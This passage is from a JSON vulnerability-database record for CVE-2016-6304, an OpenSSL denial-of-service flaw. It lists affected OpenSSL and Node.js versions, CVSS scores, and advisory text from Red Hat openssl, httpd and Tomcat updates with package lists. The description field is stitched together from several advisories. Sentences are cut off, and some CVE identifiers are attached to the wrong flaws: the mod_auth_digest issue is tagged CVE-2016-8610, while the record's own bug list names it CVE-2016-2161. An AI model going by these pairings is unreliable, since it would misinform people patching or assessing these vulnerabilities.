"cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "0.12.16", "versionStartIncluding": "0.12.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "0.10.47", "versionStartIncluding": "0.10.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "6.7.0", "versionStartIncluding": "6.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "4.6.0", "versionStartIncluding": "4.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_module_for_web_scripting:12.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-6304" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "142848" }, { "db": "PACKETSTORM", "id": "143874" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "142849" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "139769" }, { "db": "PACKETSTORM", "id": "143181" } ], "trust": 0.7 }, "cve": "CVE-2016-6304", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 7.8, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-6304", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-6304", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-6304", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201609-579", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2016-6304", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6304" }, { "db": "JVNDB", "id": "JVNDB-2016-004990" }, { "db": "CNNVD", "id": "CNNVD-201609-579" }, { "db": "NVD", "id": "CVE-2016-6304" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple memory leaks in t1_lib.c in OpenSSL before 1.0.1u, 1.0.2 before 1.0.2i, and 1.1.0 before 1.1.0a allow remote attackers to cause a denial of service (memory consumption) via large OCSP Status Request extensions. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to cause a denial-of-service condition. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23\nService Pack 1 serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.23, and includes bug fixes, which are documented in\nthe Release Notes document linked to in the References. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did not use\nany mechanisms to verify integrity of the encrypted session data stored in\nthe user\u0027s browser. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. \n(CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in conjunction\nwith a proxy or backend server that interpreted those characters\ndifferently, a remote attacker could possibly use this flaw to inject data\ninto HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd\u0027s handling of the LimitRequestFields\ndirective in mod_http2, affecting servers with HTTP/2 enabled. An attacker\ncould send crafted requests with headers larger than the server\u0027s available\nmemory, causing httpd to crash. After installing the updated\npackages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):\n\n1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth\n1384743 - CVE-2016-8610 SSL/TLS: Malformed plain-text ALERT packets could cause remote DoS\n1401528 - CVE-2016-8740 httpd: Incomplete handling of LimitRequestFields directive in mod_http2\n1406744 - CVE-2016-0736 httpd: Padding Oracle in Apache mod_session_crypto\n1406753 - CVE-2016-2161 httpd: DoS vulnerability in mod_auth_digest\n1406822 - CVE-2016-8743 httpd: Apache HTTP Request Parsing Whitespace Defects\n1412120 - CVE-2016-7056 openssl: ECDSA P-256 timing attack key recovery\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-319 - Errata for httpd 2.4.23 SP1 RHEL 7\n\n7. \n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies. The updates are documented in the Release Notes document\nlinked to in the References. If sendfile processing completed quickly, it was\npossible for the Processor to be added to the processor cache twice. This\ncould lead to invalid responses or information disclosure. (CVE-2017-5647)\n\n* A vulnerability was discovered in the error page mechanism in Tomcat\u0027s\nDefaultServlet implementation. A crafted HTTP request could cause undesired\nside effects, possibly including the removal or replacement of the custom\nerror page. Solution:\n\nBefore applying the update, back up your existing Red Hat JBoss Web Server\ninstallation (including all applications and configuration files). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:1940-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html\nIssue date: 2016-09-27\nCVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 \n CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 \n CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n(CVE-2016-2178)\n\n* It was discovered that the Datagram TLS (DTLS) implementation could fail\nto release memory in certain cases. A malicious DTLS client could cause a\nDTLS server using OpenSSL to consume an excessive amount of memory and,\npossibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw\nto make a DTLS server using OpenSSL to reject further packets sent from a\nDTLS client over an established DTLS connection. (CVE-2016-2181)\n\n* An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec()\nfunction. (CVE-2016-2182)\n\n* A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL\nprotocol. A man-in-the-middle attacker could use this flaw to recover some\nplaintext data by capturing large amounts of encrypted traffic between\nTLS/SSL server and client if the communication used a DES/3DES based\nciphersuite. (CVE-2016-2183)\n\nThis update mitigates the CVE-2016-2183 issue by lowering priority of DES\ncipher suites so they are not preferred over cipher suites using AES. For\ncompatibility reasons, DES cipher suites remain enabled by default and\nincluded in the set of cipher suites identified by the HIGH cipher string. \nFuture updates may move them to MEDIUM or not enable them by default. \n\n* An integer underflow flaw leading to a buffer over-read was found in the\nway OpenSSL parsed TLS session tickets. (CVE-2016-6302)\n\n* Multiple integer overflow flaws were found in the way OpenSSL performed\npointer arithmetic. A remote attacker could possibly use these flaws to\ncause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)\n\n* An out of bounds read flaw was found in the way OpenSSL formatted Public\nKey Infrastructure Time-Stamp Protocol data for printing. An attacker could\npossibly cause an application using OpenSSL to crash if it printed time\nstamp data from the attacker. A remote attacker could\npossibly use these flaws to crash a TLS/SSL server or client using OpenSSL. \n(CVE-2016-6306)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304\nand CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio()\n1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec()\n1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection\n1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer\n1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks\n1377594 - CVE-2016-6306 openssl: certificate message OOB reads\n1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2177\nhttps://access.redhat.com/security/cve/CVE-2016-2178\nhttps://access.redhat.com/security/cve/CVE-2016-2179\nhttps://access.redhat.com/security/cve/CVE-2016-2180\nhttps://access.redhat.com/security/cve/CVE-2016-2181\nhttps://access.redhat.com/security/cve/CVE-2016-2182\nhttps://access.redhat.com/security/cve/CVE-2016-6302\nhttps://access.redhat.com/security/cve/CVE-2016-6304\nhttps://access.redhat.com/security/cve/CVE-2016-6306\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://www.openssl.org/news/secadv/20160922.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at 